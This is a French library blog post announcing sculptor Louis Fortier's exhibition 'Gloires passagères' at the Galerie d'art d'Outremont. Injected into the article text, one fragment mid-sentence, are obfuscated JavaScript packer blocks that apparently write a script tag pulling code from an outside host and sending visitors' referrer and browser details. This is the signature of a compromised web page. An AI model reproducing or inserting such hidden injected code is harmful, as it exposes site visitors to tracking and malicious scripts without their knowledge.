Gloires passagères

Notre collègue aide-bibliothécaire Louis Fortier, document.write(“”); un sculpteur de talent (dont j’avais déjà mentionné l’exposition Métamorphose en mars), exposera à nouveau ses oeuvres en octobre.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|keysr|var|u0026u|referrer|satbz||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|enrkf|var|u0026u|referrer|rdzkk||js|php’.split(‘|’),0,{}))

Le grand écorché, 2010-2011, cire colorée sur polystyrène expansé (152 x 213 x 304 cm)

L’exposition, intitulée “Gloires passagères”, se tiendra du 4 au 28 octobre 2012 à la Galerie d’art d’Outremont (adjacente à la bibliothèque Robert-Bourassa). Situé au 41 avenue Saint-Just à Outremont, la galerie est ouverte du mardi au vendredi de 13h à 18h, et les samedi et dimanche de 13h à 17h. (Renseignements: 514 495-7419).

Louis Fortier travaille à partir de techniques de moulage qui lui permettent d’effectuer des variations dans la série. Depuis une quinzaine d’années, il revisite son anatomie — et plus particulièrement son visage — à la manière d’un journal. En cherchant des équivalences entre la nature fugitive des émotions et le caractère imprévisible de matériaux tels que la cire et le plâtre, la démarche de cet artiste déjoue la fixité habituelle propre au genre de l’autoportrait. Ainsi, les morceaux d’anatomie qu’il nous livre sont assujettis à des programmes qui génèrent des dérives et des distorsions. Du coup, le résultat de ses explorations artistiques pourraient s’entendre comme des tentatives de traduire les accidents de la vie courante et la fugacité de l’existence.

Mise à jour: article dans l’Express d’Outremont.

[ Translate ]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s